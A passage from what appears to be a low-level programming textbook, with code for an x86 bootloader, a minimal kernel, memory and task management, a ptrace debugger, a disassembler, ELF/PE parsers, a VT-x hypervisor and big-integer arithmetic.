msg_loading db "Loading Stage 2...", 13, 10, 0
msg_error db "Disk error!", 13, 10, 0

times 510-($-$$) db 0
dw 0xAA55
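
INT 0x13 function 0x02 addresses sectors by cylinder, head and sector (CHS), with sectors numbered from 1. When planning where stage 2 and the kernel sit on disk it helps to convert between CHS and linear block numbers. The C sketch below shows the standard conversion; the geometry parameters are assumptions that must match the boot medium (for example 2 heads and 18 sectors per track on a 1.44 MB floppy).

```c
#include <stdint.h>

typedef struct { uint32_t cylinder, head, sector; } chs_t;

/* CHS -> linear block address; sectors are 1-based. */
static uint32_t chs_to_lba(chs_t c, uint32_t heads, uint32_t spt) {
    return (c.cylinder * heads + c.head) * spt + (c.sector - 1);
}

/* Linear block address -> CHS for the given geometry. */
static chs_t lba_to_chs(uint32_t lba, uint32_t heads, uint32_t spt) {
    chs_t c;
    c.cylinder = lba / (heads * spt);
    c.head     = (lba / spt) % heads;
    c.sector   = (lba % spt) + 1;
    return c;
}
```

With this in hand, the "cylinder 0, head 0, sector 2" request in the listing corresponds to block 1, the sector immediately after the boot sector.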

Stage 2 Bootloader

; boot2.asm - Second stage bootloader
[org 0x0000]
[bits 16]

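start:
    ; Set up segments
    mov ax, cs
    mov ds, ax
    mov es, ax
    mov ss, ax
    mov sp, 0xFFFE      ; keep the stack pointer word-aligned
    
    ; Save boot drive (stage 1 still holds it in DL when it jumps here)
    mov [boot_drive], dl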
    
    ; Print message
    mov si, msg_boot2
    call print_string
    
    ; Enable A20 line
    call enable_a20
    
    ; Load kernel
    mov si, msg_load_kernel
    call print_string
    
    ; Load kernel from disk
    mov ah, 0x02
    mov al, 0x40        ; 64 sectors (32KB)
    mov ch, 0
    mov cl, 0x22        ; after boot sectors
    mov dh, 0
    mov dl, [boot_drive]
    mov bx, 0x2000      ; kernel segment
    mov es, bx
    xor bx, bx
    int 0x13
    
    jc disk_error
    
    ; Switch to protected mode
    call switch_to_pm
    
    ; Should never return
    jmp $

enable_a20:
    in al, 0x92
    or al, 2
    out 0x92, al
    ret

; ... print_string, disk_error as before ...

%include "gdt.inc"

switch_to_pm:
    cli
    lgdt [gdt_desc]
    
    mov eax, cr0
    or eax, 1
    mov cr0, eax
    
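    ; This code is assembled at offset 0 of segment 0x1000, so with a
    ; flat (base 0) code segment pm_start lies at linear 0x10000 + pm_start
    jmp dword 0x08:(0x10000 + pm_start)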

[bits 32]
pm_start:
    mov ax, 0x10
    mov ds, ax
    mov es, ax
    mov fs, ax
    mov gs, ax
    mov ss, ax
    mov esp, 0x90000
    
    ; Jump to kernel (loaded at 0x2000:0x0000 = linear 0x20000)
    jmp 0x08:0x20000

boot_drive db 0
msg_boot2 db "TinyOS Bootloader Stage 2", 13, 10, 0
msg_load_kernel db "Loading kernel...", 13, 10, 0
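
The contents of gdt.inc are not shown here, but the selectors 0x08 and 0x10 used above imply a code descriptor in GDT entry 1 and a data descriptor in entry 2. The C sketch below packs a descriptor from its fields so that the constants placed in such a file can be double-checked; gdt_entry is an illustrative helper, and the flat 4 GB segments in the usage note are an assumption about what gdt.inc defines.

```c
#include <stdint.h>

/* Pack an 8-byte segment descriptor.
   access: present/DPL/type byte, flags: G, D/B, L, AVL (upper nibble of byte 6). */
static uint64_t gdt_entry(uint32_t base, uint32_t limit, uint8_t access, uint8_t flags) {
    uint64_t d = 0;
    d |= (uint64_t)(limit & 0xFFFF);              /* limit 15:0  */
    d |= (uint64_t)(base & 0xFFFFFF) << 16;       /* base 23:0   */
    d |= (uint64_t)access << 40;                  /* access byte */
    d |= (uint64_t)((limit >> 16) & 0xF) << 48;   /* limit 19:16 */
    d |= (uint64_t)(flags & 0xF) << 52;           /* flags       */
    d |= (uint64_t)(base >> 24) << 56;            /* base 31:24  */
    return d;
}
```

A flat 32-bit code segment is gdt_entry(0, 0xFFFFF, 0x9A, 0xC), which evaluates to 0x00CF9A000000FFFF; the matching data segment uses access byte 0x92.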

Kernel

Minimal Kernel

// kernel.c - Minimal kernel
void kernel_main(void) {
    // VGA text mode buffer (volatile: writes must reach video memory)
    volatile char *video = (volatile char*)0xB8000;
    const char *message = "Hello from TinyOS Kernel!";
    
    // Clear screen
    for (int i = 0; i < 80 * 25 * 2; i += 2) {
        video[i] = ' ';
        video[i + 1] = 0x07;
    }
    
    // Print message
    int i = 0;
    while (message[i]) {
        video[i * 2] = message[i];
        video[i * 2 + 1] = 0x0A;  // green
        i++;
    }
    
    // Hang
    while (1) {
        __asm__("hlt");
    }
}

Linker Script

/* kernel.ld */
OUTPUT_FORMAT(elf32-i386)
ENTRY(kernel_main)

SECTIONS
{
    . = 0x20000;   /* must match the stage 2 load address 0x2000:0x0000 */
    
    .text : {
        *(.text)
        *(.text.*)
    }
    
    .data : {
        *(.data)
        *(.data.*)
    }
    
    .bss : {
        *(.bss)
        *(.bss.*)
    }
    
    _kernel_end = .;   /* end of image, referenced by the memory manager */
    
    /DISCARD/ : {
        *(.comment)
        *(.eh_frame)
    }
}

Memory Manager

Simple Page Allocator

// memory.c - Physical memory manager
// Bitmap convention: bit set = page free, bit clear = page in use
#include <stddef.h>
#include <stdint.h>

#define PAGE_SIZE 4096
#define PAGE_COUNT (1024 * 1024)  // 4GB / 4KB
#define LOW_MEMORY_END 0x100000   // first 1MB: IVT, boot code, stack, VGA, ROM

extern char _kernel_end;          // must be provided by the linker script
static uint32_t page_bitmap[PAGE_COUNT / 32];

void init_memory(uint32_t memory_size) {
    // Mark all pages as used initially
    for (int i = 0; i < PAGE_COUNT / 32; i++) {
        page_bitmap[i] = 0;
    }
    
    // Keep low memory and the kernel image reserved
    uint32_t reserved_end = (uint32_t)&_kernel_end;
    if (reserved_end < LOW_MEMORY_END) {
        reserved_end = LOW_MEMORY_END;
    }
    uint32_t first_free = (reserved_end + PAGE_SIZE - 1) / PAGE_SIZE;
    
    // Mark the remaining installed RAM as free
    for (uint32_t pfn = first_free; pfn < memory_size / PAGE_SIZE; pfn++) {
        page_bitmap[pfn / 32] |= (1u << (pfn % 32));
    }
}

void* alloc_page(void) {
    for (int i = 0; i < PAGE_COUNT / 32; i++) {
        if (page_bitmap[i] != 0) {
            // Find first free bit
            int bit = __builtin_ctz(page_bitmap[i]);
            page_bitmap[i] &= ~(1u << bit);
            return (void*)(((uint32_t)i * 32 + bit) * PAGE_SIZE);
        }
    }
    return NULL;  // Out of memory
}

void free_page(void* page) {
    uint32_t pfn = (uint32_t)page / PAGE_SIZE;
    uint32_t index = pfn / 32;
    uint32_t bit = pfn % 32;
    page_bitmap[index] |= (1u << bit);
}

Scheduler

Round-Robin Scheduler

// scheduler.c
#define MAX_TASKS 64
#define STACK_SIZE 4096

typedef struct {
    uint32_t esp;
    uint32_t ebp;
    uint32_t eip;
    uint32_t state;  // 0 = free, 1 = ready, 2 = running
    uint8_t stack[STACK_SIZE];
} task_t;

static task_t tasks[MAX_TASKS];
static int current_task = -1;
static int next_task = 0;

void scheduler_init(void) {
    for (int i = 0; i < MAX_TASKS; i++) {
        tasks[i].state = 0;  // free
    }
}

int create_task(void (*entry)(void)) {
    // Find free task slot
    int i;
    for (i = 0; i < MAX_TASKS; i++) {
        if (tasks[i].state == 0) break;
    }
    if (i == MAX_TASKS) return -1;
    
    // Initialize stack
    uint32_t *stack = (uint32_t*)(tasks[i].stack + STACK_SIZE - 4);
    uint32_t *stack_top = stack;
    
    // Set up initial context (for context switch)
    *--stack = (uint32_t)entry;      // EIP
    *--stack = 0x202;                // EFLAGS (IF set so interrupts stay enabled)
    *--stack = 0;                    // EAX
    *--stack = 0;                    // ECX
    *--stack = 0;                    // EDX
    *--stack = 0;                    // EBX
    *--stack = 0;                    // ESP (unused)
    *--stack = (uint32_t)stack_top;  // EBP
    *--stack = 0;                    // ESI
    *--stack = 0;                    // EDI
    
    tasks[i].esp = (uint32_t)stack;
    tasks[i].ebp = (uint32_t)stack_top;
    tasks[i].state = 1;  // ready
    
    return i;
}

// Called by timer interrupt
void schedule(void) {
    if (current_task != -1) {
        // Save current task state
        __asm__ volatile(
            "mov %%esp, %0\n"
            "mov %%ebp, %1\n"
            : "=r"(tasks[current_task].esp),
              "=r"(tasks[current_task].ebp)
        );
        tasks[current_task].state = 1;
    }
    
    // Find next ready task
    int found = 0;
    for (int i = 0; i < MAX_TASKS; i++) {
        next_task = (next_task + 1) % MAX_TASKS;
        if (tasks[next_task].state == 1) {
            found = 1;
            break;
        }
    }
    
    if (!found) {
        // No tasks, just return
        return;
    }
    
    // Switch to next task
    current_task = next_task;
    tasks[current_task].state = 2;
    
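    // Restore task state
    // NOTE: switching ESP inside a compiled C function only works if the
    // code that runs next pops exactly the frame built in create_task();
    // a production kernel performs this step in a dedicated assembly routine.
    __asm__ volatile(
        "mov %0, %%esp\n"
        "mov %1, %%ebp\n"
        :
        : "r"(tasks[current_task].esp),
          "r"(tasks[current_task].ebp)
        : "memory"
    );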
}

Chapter 26: Writing a Custom Debugger

Breakpoints

Software Breakpoints (INT3)

// Set software breakpoint
void set_breakpoint(pid_t pid, void *addr) {
    // Save original instruction
    unsigned char original;
    read_process_memory(pid, addr, &original, 1);
    
    // Write INT3 (0xCC)
    unsigned char int3 = 0xCC;
    write_process_memory(pid, addr, &int3, 1);
    
    // Store original for later
    breakpoint *bp = malloc(sizeof(breakpoint));
    bp->addr = addr;
    bp->original = original;
    // Add to breakpoint list
}

// Handle breakpoint hit
void handle_breakpoint(pid_t pid) {
    // Get register context
    struct user_regs_struct regs;
    ptrace(PTRACE_GETREGS, pid, NULL, &regs);
    
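    // RIP points to next instruction after INT3
    void *bp_addr = (void*)(regs.rip - 1);
    
    // Restore original instruction
    breakpoint *bp = find_breakpoint(bp_addr);
    if (!bp) return;  // trap was not caused by one of our breakpoints
    write_process_memory(pid, bp_addr, &bp->original, 1);
    
    // Rewind RIP so the restored instruction is the one that executes
    regs.rip = (unsigned long long)bp_addr;
    ptrace(PTRACE_SETREGS, pid, NULL, &regs);
    
    // Single-step to execute original instruction
    ptrace(PTRACE_SINGLESTEP, pid, NULL, NULL);
    waitpid(pid, NULL, 0);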
    
    // Re-insert breakpoint
    unsigned char int3 = 0xCC;
    write_process_memory(pid, bp_addr, &int3, 1);
    
    // Continue execution
    ptrace(PTRACE_CONT, pid, NULL, NULL);
}

Hardware Breakpoints

; Set hardware breakpoint via debug registers
set_hw_breakpoint:
    ; DR0 = breakpoint address
    mov rax, [breakpoint_addr]
    mov dr0, rax
    
    ; DR7 = enable breakpoint 0, type = execution
    mov rax, 0x1        ; L0 = 1 (bit 0)
                        ; R/W0 (bits 16-17) = 00 (execution)
                        ; LEN0 (bits 18-19) = 00 (1 byte, required for execution)
    mov dr7, rax
    
    ret
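
The DR7 layout generalises to all four debug registers: the local-enable bit for slot n is bit 2n, and its R/W and LEN fields occupy the four bits starting at bit 16 + 4n. The C sketch below builds a DR7 value from those fields; dr7_enable and the DR7_* constants are names chosen for this illustration.

```c
#include <stdint.h>

/* R/W field encodings */
enum { DR7_EXECUTE = 0, DR7_WRITE = 1, DR7_IO = 2, DR7_READ_WRITE = 3 };

/* Return `dr7` with breakpoint `slot` (0-3) locally enabled.
   len_bits is the raw LEN encoding: 0 = 1 byte, 1 = 2, 3 = 4, 2 = 8 bytes. */
static uint64_t dr7_enable(uint64_t dr7, unsigned slot, unsigned rw, unsigned len_bits) {
    unsigned ctl = 16 + slot * 4;                  /* start of R/Wn and LENn */
    dr7 &= ~((uint64_t)0xF << ctl);                /* clear old R/W and LEN  */
    dr7 |= (uint64_t)(rw & 3) << ctl;              /* R/Wn                   */
    dr7 |= (uint64_t)(len_bits & 3) << (ctl + 2);  /* LENn                   */
    dr7 |= (uint64_t)1 << (slot * 2);              /* Ln: local enable       */
    return dr7;
}
```

An execution breakpoint in slot 0 is dr7_enable(0, 0, DR7_EXECUTE, 0), which gives 0x1. A user-mode debugger cannot write DR7 directly and would pass such a value to the kernel, for example through ptrace.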

Register Inspection

Reading Registers with ptrace

void print_registers(pid_t pid) {
    struct user_regs_struct regs;
    if (ptrace(PTRACE_GETREGS, pid, NULL, &regs) == -1) {
        perror("ptrace GETREGS");
        return;
    }
    
    printf("RAX: 0x%016llx\n", regs.rax);
    printf("RBX: 0x%016llx\n", regs.rbx);
    printf("RCX: 0x%016llx\n", regs.rcx);
    printf("RDX: 0x%016llx\n", regs.rdx);
    printf("RSI: 0x%016llx\n", regs.rsi);
    printf("RDI: 0x%016llx\n", regs.rdi);
    printf("RBP: 0x%016llx\n", regs.rbp);
    printf("RSP: 0x%016llx\n", regs.rsp);
    printf("RIP: 0x%016llx\n", regs.rip);
    printf("EFLAGS: 0x%08llx\n", regs.eflags);
}

Disassembler Engine

Simple Disassembler

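// Simple x86-64 disassembler for a few common one-byte opcodes
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    char mnemonic[16];
    char operands[64];
} instruction_t;

// Register names indexed by the low three opcode bits
static const char *const reg64_names[8] = {
    "rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"
};
static const char *const reg32_names[8] = {
    "eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"
};

instruction_t disassemble(unsigned char *code, size_t *size) {
    instruction_t inst = {0};
    
    unsigned char opcode = code[0];
    
    switch (opcode) {
        case 0x90:
            strcpy(inst.mnemonic, "nop");
            *size = 1;
            break;
            
        case 0xC3:
            strcpy(inst.mnemonic, "ret");
            *size = 1;
            break;
            
        case 0xCC:
            strcpy(inst.mnemonic, "int3");
            *size = 1;
            break;
            
        case 0x50 ... 0x57:  // push r64 (case ranges are a GNU C extension)
            strcpy(inst.mnemonic, "push");
            strcpy(inst.operands, reg64_names[opcode - 0x50]);
            *size = 1;
            break;
            
        case 0x58 ... 0x5F:  // pop r64
            strcpy(inst.mnemonic, "pop");
            strcpy(inst.operands, reg64_names[opcode - 0x58]);
            *size = 1;
            break;
            
        case 0xB8 ... 0xBF: {  // mov r32, imm32
            uint32_t imm;
            memcpy(&imm, code + 1, sizeof imm);  // avoids an unaligned load
            strcpy(inst.mnemonic, "mov");
            sprintf(inst.operands, "%s, 0x%x", reg32_names[opcode - 0xB8], imm);
            *size = 5;
            break;
        }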
            
        default:
            strcpy(inst.mnemonic, "db");
            sprintf(inst.operands, "0x%02x", opcode);
            *size = 1;
    }
    
    return inst;
}

Chapter 27: Writing a PE/ELF Parser

ELF Parser

// elf_parser.c
#include <stdio.h>
#include <stdlib.h>
#include <elf.h>

typedef struct {
    FILE *fp;
    Elf64_Ehdr ehdr;
    Elf64_Phdr *phdr;
    Elf64_Shdr *shdr;
    char *shstrtab;
} elf_file_t;

elf_file_t* elf_open(const char *filename) {
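    // Zero-initialise so elf_close() can safely free pointers that were never set
    elf_file_t *elf = calloc(1, sizeof(elf_file_t));
    if (!elf) return NULL;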
    
    elf->fp = fopen(filename, "rb");
    if (!elf->fp) {
        free(elf);
        return NULL;
    }
    
    // Read ELF header
    if (fread(&elf->ehdr, sizeof(Elf64_Ehdr), 1, elf->fp) != 1) {
        fclose(elf->fp);
        free(elf);
        return NULL;
    }
    
    // Verify ELF magic
    if (elf->ehdr.e_ident[EI_MAG0] != ELFMAG0 ||
        elf->ehdr.e_ident[EI_MAG1] != ELFMAG1 ||
        elf->ehdr.e_ident[EI_MAG2] != ELFMAG2 ||
        elf->ehdr.e_ident[EI_MAG3] != ELFMAG3) {
        fclose(elf->fp);
        free(elf);
        return NULL;
    }
    
    // Read program headers
    elf->phdr = malloc(elf->ehdr.e_phnum * sizeof(Elf64_Phdr));
    fseek(elf->fp, elf->ehdr.e_phoff, SEEK_SET);
    fread(elf->phdr, sizeof(Elf64_Phdr), elf->ehdr.e_phnum, elf->fp);
    
    // Read section headers
    elf->shdr = malloc(elf->ehdr.e_shnum * sizeof(Elf64_Shdr));
    fseek(elf->fp, elf->ehdr.e_shoff, SEEK_SET);
    fread(elf->shdr, sizeof(Elf64_Shdr), elf->ehdr.e_shnum, elf->fp);
    
    // Read section header string table
    if (elf->ehdr.e_shstrndx != SHN_UNDEF) {
        Elf64_Shdr *shstr = &elf->shdr[elf->ehdr.e_shstrndx];
        elf->shstrtab = malloc(shstr->sh_size);
        fseek(elf->fp, shstr->sh_offset, SEEK_SET);
        fread(elf->shstrtab, 1, shstr->sh_size, elf->fp);
    }
    
    return elf;
}

void elf_print_info(elf_file_t *elf) {
    printf("ELF Type: ");
    switch (elf->ehdr.e_type) {
        case ET_REL:  printf("REL (Relocatable)\n"); break;
        case ET_EXEC: printf("EXEC (Executable)\n"); break;
        case ET_DYN:  printf("DYN (Shared object)\n"); break;
        default:      printf("Unknown\n");
    }
    
    printf("Entry point: 0x%lx\n", elf->ehdr.e_entry);
    printf("Program headers: %d\n", elf->ehdr.e_phnum);
    printf("Section headers: %d\n", elf->ehdr.e_shnum);
    
    // Print program headers
    for (int i = 0; i < elf->ehdr.e_phnum; i++) {
        Elf64_Phdr *p = &elf->phdr[i];
        printf("PHDR %d: type=%u vaddr=0x%lx memsz=%lu\n",
               i, p->p_type, p->p_vaddr, p->p_memsz);
    }
    
    // Print sections
    for (int i = 0; i < elf->ehdr.e_shnum; i++) {
        Elf64_Shdr *s = &elf->shdr[i];
        const char *name = elf->shstrtab ? elf->shstrtab + s->sh_name : "?";
        printf("SEC %d: %-12s addr=0x%lx size=%lu\n",
               i, name, s->sh_addr, s->sh_size);
    }
}

void elf_close(elf_file_t *elf) {
    fclose(elf->fp);
    free(elf->phdr);
    free(elf->shdr);
    if (elf->shstrtab) free(elf->shstrtab);
    free(elf);
}

PE Parser

// pe_parser.c
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

typedef struct {
    FILE *fp;
    IMAGE_DOS_HEADER dos_header;
    IMAGE_NT_HEADERS nt_headers;
    IMAGE_SECTION_HEADER *sections;
} pe_file_t;

pe_file_t* pe_open(const char *filename) {
    pe_file_t *pe = malloc(sizeof(pe_file_t));
    
    pe->fp = fopen(filename, "rb");
    if (!pe->fp) {
        free(pe);
        return NULL;
    }
    
    // Read DOS header
    fread(&pe->dos_header, sizeof(IMAGE_DOS_HEADER), 1, pe->fp);
    
    // Verify DOS magic
    if (pe->dos_header.e_magic != IMAGE_DOS_SIGNATURE) {
        fclose(pe->fp);
        free(pe);
        return NULL;
    }
    
    // Seek to NT headers
    fseek(pe->fp, pe->dos_header.e_lfanew, SEEK_SET);
    
    // Read NT headers
    fread(&pe->nt_headers, sizeof(IMAGE_NT_HEADERS), 1, pe->fp);
    
    // Verify PE signature
    if (pe->nt_headers.Signature != IMAGE_NT_SIGNATURE) {
        fclose(pe->fp);
        free(pe);
        return NULL;
    }
    
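    // Read section headers. They follow the optional header, whose size is
    // given by SizeOfOptionalHeader and may differ from the compiled struct.
    int num_sections = pe->nt_headers.FileHeader.NumberOfSections;
    long section_offset = pe->dos_header.e_lfanew + sizeof(DWORD) +
                          sizeof(IMAGE_FILE_HEADER) +
                          pe->nt_headers.FileHeader.SizeOfOptionalHeader;
    fseek(pe->fp, section_offset, SEEK_SET);
    pe->sections = malloc(num_sections * sizeof(IMAGE_SECTION_HEADER));
    fread(pe->sections, sizeof(IMAGE_SECTION_HEADER), 
          num_sections, pe->fp);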
    
    return pe;
}

void pe_print_info(pe_file_t *pe) {
    IMAGE_FILE_HEADER *file = &pe->nt_headers.FileHeader;
    IMAGE_OPTIONAL_HEADER *opt = &pe->nt_headers.OptionalHeader;
    
    printf("Machine: 0x%04x\n", file->Machine);
    printf("Sections: %d\n", file->NumberOfSections);
    printf("Entry point: 0x%08x\n", opt->AddressOfEntryPoint);
    printf("Image base: 0x%016llx\n", opt->ImageBase);
    
    // Print sections
    for (int i = 0; i < file->NumberOfSections; i++) {
        IMAGE_SECTION_HEADER *s = &pe->sections[i];
        // Name is 8 bytes and not NUL-terminated when all 8 are used
        printf("SEC %d: %-8.8s vaddr=0x%08lx size=%lu\n",
               i, (const char*)s->Name, s->VirtualAddress, s->SizeOfRawData);
    }
}

void pe_close(pe_file_t *pe) {
    fclose(pe->fp);
    free(pe->sections);
    free(pe);
}
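
The file offset of the section table depends on the optional header size recorded in the file, not on the size of any compiled structure. The arithmetic can be expressed without windows.h, which makes it usable on non-Windows hosts; pe_section_table_offset is a hypothetical helper name, while the 4-byte signature and 20-byte file header sizes are fixed by the PE format.

```c
#include <stdint.h>

#define PE_SIGNATURE_SIZE   4   /* "PE\0\0" */
#define PE_FILE_HEADER_SIZE 20  /* size of the COFF file header */

/* File offset of the first section header. */
static uint32_t pe_section_table_offset(uint32_t e_lfanew,
                                        uint16_t size_of_optional_header) {
    return e_lfanew + PE_SIGNATURE_SIZE + PE_FILE_HEADER_SIZE
         + size_of_optional_header;
}
```

For a typical 32-bit image with e_lfanew = 0x80 and a 0xE0-byte optional header the table starts at 0x178; a 64-bit image with a 0xF0-byte optional header puts it at 0x188.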

Chapter 28: Building a Hypervisor

    EXIT_QUALIFICATION        = 0x6400,
    IO_RCX                     = 0x6402,
    IO_RSI                     = 0x6404,
    IO_RDI                     = 0x6406,
    IO_RIP                     = 0x6408,
    GUEST_LINEAR_ADDRESS       = 0x640A,
    GUEST_CR0                  = 0x6800,
    GUEST_CR3                  = 0x6802,
    GUEST_CR4                  = 0x6804,
    GUEST_ES_BASE              = 0x6806,
    GUEST_CS_BASE              = 0x6808,
    GUEST_SS_BASE              = 0x680A,
    GUEST_DS_BASE              = 0x680C,
    GUEST_FS_BASE              = 0x680E,
    GUEST_GS_BASE              = 0x6810,
    GUEST_LDTR_BASE            = 0x6812,
    GUEST_TR_BASE              = 0x6814,
    GUEST_GDTR_BASE            = 0x6816,
    GUEST_IDTR_BASE            = 0x6818,
    GUEST_DR7                  = 0x681A,
    GUEST_RSP                  = 0x681C,
    GUEST_RIP                  = 0x681E,
    GUEST_RFLAGS               = 0x6820,
    GUEST_PENDING_DBG_EXCEPTIONS = 0x6822,
    GUEST_SYSENTER_ESP         = 0x6824,
    GUEST_SYSENTER_EIP         = 0x6826,
    HOST_CR0                   = 0x6C00,
    HOST_CR3                   = 0x6C02,
    HOST_CR4                   = 0x6C04,
    HOST_FS_BASE               = 0x6C06,
    HOST_GS_BASE               = 0x6C08,
    HOST_TR_BASE               = 0x6C0A,
    HOST_GDTR_BASE             = 0x6C0C,
    HOST_IDTR_BASE             = 0x6C0E,
    HOST_RSP                   = 0x6C14,
    HOST_RIP                   = 0x6C16
};

Simple Hypervisor Implementation

// hypervisor.c - Minimal VT-x hypervisor
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// VMX region structures
typedef struct {
    uint32_t revision_id;
    uint32_t abort_indicator;
    uint8_t data[0];
} __attribute__((packed)) vmxon_region_t;

typedef struct {
    uint32_t revision_id;
    uint8_t data[0];
} __attribute__((packed)) vmcs_t;

// VM-exit information
typedef struct {
    uint64_t exit_reason;
    uint64_t exit_qualification;
    uint64_t guest_linear_address;
    uint64_t guest_physical_address;
    uint64_t instruction_length;
    uint64_t instruction_info;
    uint64_t interrupt_info;
    uint64_t error_code;
} __attribute__((packed)) vm_exit_info_t;

// Global state
static vmxon_region_t *vmxon_region;
static vmcs_t *vmcs;
static void *vmxon_region_physical;
static void *vmcs_physical;

// Check for VMX support
int vmx_supported(void) {
    uint32_t eax, ebx, ecx, edx;
    
    // Check CPUID.1:ECX.VMX bit
    __asm__ volatile("cpuid"
                     : "=a"(eax), "=b"(ebx), "=c"(ecx), "=d"(edx)
                     : "a"(1));
    
    if (!(ecx & (1 << 5))) {
        return 0;  // VMX not supported
    }
    
    // Check CR4.VMXE bit can be set
    uint64_t cr4;
    __asm__ volatile("mov %%cr4, %0" : "=r"(cr4));
    cr4 |= (1 << 13);  // VMXE bit
    __asm__ volatile("mov %0, %%cr4" : : "r"(cr4));
    
    __asm__ volatile("mov %%cr4, %0" : "=r"(cr4));
    if (!(cr4 & (1 << 13))) {
        return 0;  // Cannot enable VMX
    }
    
    return 1;
}

// Initialize VMX
int vmx_init(void) {
    if (!vmx_supported()) {
        return -1;
    }
    
    // Allocate VMXON region (4KB aligned)
    vmxon_region = aligned_alloc(4096, 4096);
    if (!vmxon_region) {
        return -1;
    }
    memset(vmxon_region, 0, 4096);
    
    // Get VMX revision ID from IA32_VMX_BASIC MSR
    uint32_t msrl, msrh;
    __asm__ volatile("rdmsr" : "=a"(msrl), "=d"(msrh) : "c"(0x480));
    vmxon_region->revision_id = msrl & 0x7FFFFFFF;
    
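    // Store physical address
    // NOTE: this assumes an identity mapping (virtual == physical); a real
    // kernel must translate the virtual address instead.
    vmxon_region_physical = (void*)((uint64_t)vmxon_region & 0xFFFFFFFFFFFFF000);
    
    // Execute VMXON (CF or ZF set afterwards means the instruction failed)
    uint8_t failed;
    __asm__ volatile(
        "vmxon %[pa]\n"
        "setna %0\n"
        : "=q"(failed)
        : [pa] "m"(vmxon_region_physical)
        : "cc", "memory"
    );
    
    if (failed) {
        free(vmxon_region);
        return -1;
    }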
    
    // Allocate VMCS (4KB aligned)
    vmcs = aligned_alloc(4096, 4096);
    if (!vmcs) {
        __asm__ volatile("vmxoff" : : : "cc");  // leave VMX operation
        free(vmxon_region);
        return -1;
    }
    memset(vmcs, 0, 4096);
    vmcs->revision_id = msrl & 0x7FFFFFFF;
    vmcs_physical = (void*)((uint64_t)vmcs & 0xFFFFFFFFFFFFF000);
    
    // Clear and load VMCS
    __asm__ volatile(
        "vmclear %[pa]\n"
        "vmptrld %[pa]\n"
        : 
        : [pa] "m"(vmcs_physical)
        : "cc", "memory"
    );
    
    return 0;
}

// Configure VMCS for guest
void vmx_setup_guest(void) {
    // Host state
    uint64_t cr0, cr3, cr4, rsp, rip;
    
    __asm__ volatile("mov %%cr0, %0" : "=r"(cr0));
    __asm__ volatile("mov %%cr3, %0" : "=r"(cr3));
    __asm__ volatile("mov %%cr4, %0" : "=r"(cr4));
    __asm__ volatile("mov %%rsp, %0" : "=r"(rsp));
    
    // Get host RIP (return address after VM exit)
    rip = (uint64_t)vm_exit_handler;
    
    // Write host state to VMCS
    vmwrite(HOST_CR0, cr0);
    vmwrite(HOST_CR3, cr3);
    vmwrite(HOST_CR4, cr4);
    vmwrite(HOST_RSP, rsp);
    vmwrite(HOST_RIP, rip);
    
    // Set up control fields
    uint32_t pin_ctls = 0;
    uint32_t cpu_ctls = CPU_BASED_HLT_EXITING |
                        CPU_BASED_CR8_LOAD_EXITING |
                        CPU_BASED_CR8_STORE_EXITING |
                        CPU_BASED_USE_MSR_BITMAPS;
    
    vmwrite(PIN_BASED_VM_EXEC_CONTROL, pin_ctls);
    vmwrite(CPU_BASED_VM_EXEC_CONTROL, cpu_ctls);
    
    // Set up exit controls
    uint32_t exit_ctls = 0;
    vmwrite(VM_EXIT_CONTROLS, exit_ctls);
    
    // Set up entry controls
    uint32_t entry_ctls = 0;
    vmwrite(VM_ENTRY_CONTROLS, entry_ctls);
}

// VM exit handler
void vm_exit_handler(void) {
    uint64_t exit_reason;
    uint64_t exit_qualification;
    
    // Read exit reason
    vmread(VM_EXIT_REASON, &exit_reason);
    vmread(EXIT_QUALIFICATION, &exit_qualification);
    
    // Handle different exit reasons
    switch (exit_reason & 0xFFFF) {
        case 0:  // Exception or NMI
            handle_exception(exit_qualification);
            break;
            
        case 10:  // CPUID
            handle_cpuid();
            break;
            
        case 12:  // HLT
            handle_hlt();
            break;
            
        case 18:  // VMCALL
            handle_vmcall();
            break;
            
        default:
            // Unknown exit - just resume
            break;
    }
    
    // Return to guest
    __asm__ volatile("vmresume");
}

// Launch guest
void vmx_launch_guest(void) {
    uint8_t failed;  // SETNA writes a single byte
    __asm__ volatile(
        "vmlaunch\n"
        "setna %0\n"
        : "=q"(failed)
        :
        : "cc", "memory"
    );
    
    if (failed) {
        // VM launch failed - check VMCS
        uint64_t error;
        vmread(VM_INSTRUCTION_ERROR, &error);
        printf("VMLAUNCH failed: error %llu\n", (unsigned long long)error);
    }
}
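
VM entry fails if a control field has a reserved bit in the wrong state, so values such as pin_ctls = 0 normally have to be adjusted against the capability MSRs first (IA32_VMX_PINBASED_CTLS at 0x481, IA32_VMX_PROCBASED_CTLS at 0x482, and so on). The low 32 bits of each MSR list the bits that must be 1, and the high 32 bits list the bits that may be 1. A minimal sketch of that adjustment follows; vmx_adjust_controls is an illustrative name, and reading the MSR itself is left to the caller.

```c
#include <stdint.h>

/* Combine the desired control bits with the constraints reported by a
   VMX capability MSR. */
static uint32_t vmx_adjust_controls(uint32_t desired, uint64_t cap_msr) {
    uint32_t must_be_one = (uint32_t)cap_msr;          /* allowed-0 settings */
    uint32_t may_be_one  = (uint32_t)(cap_msr >> 32);  /* allowed-1 settings */
    return (desired | must_be_one) & may_be_one;
}
```

If a requested feature bit disappears from the result, the processor does not support it and the hypervisor should fall back or refuse to start.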

PART XI — Cryptography & Low-Level Math

Chapter 29: Big Integer Arithmetic

Big Integer Representation

// bigint.h - Big integer library
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    uint64_t *words;   // Array of 64-bit words
    size_t size;       // Number of words
    int sign;          // 0 positive, 1 negative
} bigint_t;

// Create new big integer
bigint_t* bigint_new(size_t size) {
    bigint_t *bn = malloc(sizeof(bigint_t));
    bn->words = calloc(size, sizeof(uint64_t));
    bn->size = size;
    bn->sign = 0;
    return bn;
}

// Free big integer
void bigint_free(bigint_t *bn) {
    free(bn->words);
    free(bn);
}

Addition and Subtraction

; bigint_add.asm - Big integer addition
; RDI = destination, RSI = first, RDX = second, RCX = word count
; Words are stored least significant first; returns carry-out (0 or 1) in RAX
global bigint_add

bigint_add:
    push rbp
    mov rbp, rsp
    
    xor r8, r8          ; word index = 0
    test rcx, rcx       ; also clears CF for the first ADC
    jz .done
    
.loop:
    mov rax, [rsi + r8*8]      ; load from first
    adc rax, [rdx + r8*8]      ; add second plus carry from previous word
    mov [rdi + r8*8], rax      ; store result
    
